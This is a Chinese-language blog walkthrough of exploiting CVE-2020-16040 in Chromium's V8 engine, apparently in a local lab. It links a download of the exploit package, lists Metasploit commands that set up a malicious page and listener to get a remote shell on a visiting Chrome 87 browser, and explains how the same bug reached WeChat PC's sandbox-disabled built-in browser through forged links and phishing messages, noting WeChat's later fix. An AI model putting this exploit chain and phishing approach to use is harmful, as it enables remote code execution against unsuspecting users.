CVE-2020-16040 Chromium V8引擎 谷歌浏览器远程代码执行

嚯嚯嚯www 52 2022-08-26

HW期间热新闻
漏洞详情CVEhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16040

本地测试环境:WinServ2012+Google Chrome 87.0.4280.66 (64 bit)
[dl href=“taoreset.cn:93/s/9EymD4P33Ed39J7”]CVE-2020-16040.zip[/dl]
64992-qqb3e6ufq6q.png

//测试关闭chrome沙箱环境
59056-vfu7uytwjt.png

//加载rb脚本后,show targets命令查看受攻击目标,可以看到三个平台都受威胁
14783-lzo83hqvzwk.png

//配置攻击参数

msf5 > use exploit/multi/browser/chrome_simplifiedlowering_overflow
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvport 80
srvport => 80
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set uripath /
uripath => /
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvhost 0.0.0.0
srvhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set lhost YourIP
lhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > run

//配置如图
65166-rqurd4s95p.png

//运行run,开启本地端口监听
35572-ixxpk0akqy.png

//使用浏览器访问后,监听建立
11148-9juvntu8wvc.png

//进入shell成功,权限为用户的权限
80798-tosr7vkznck.png

在hw期间,青藤爆出了因为此而造成的微信pc端漏洞,原因为微信内置的浏览采用chrome,而且是关闭沙箱的,所以利用方法一致,可造成远程命令执行
通过伪造链接,钓鱼信息,被动使受害者点击链接,姿势多变
75809-2aqsyg9w1wk.png

微信紧急更新了.143版本
80925-xqhsfd7togn.png

新版本中,所有的链接将采用系统默认浏览器打开,而不再是微信内置的浏览器,避免了沙箱关闭的风险
72825-h0bx4n1f3cu.png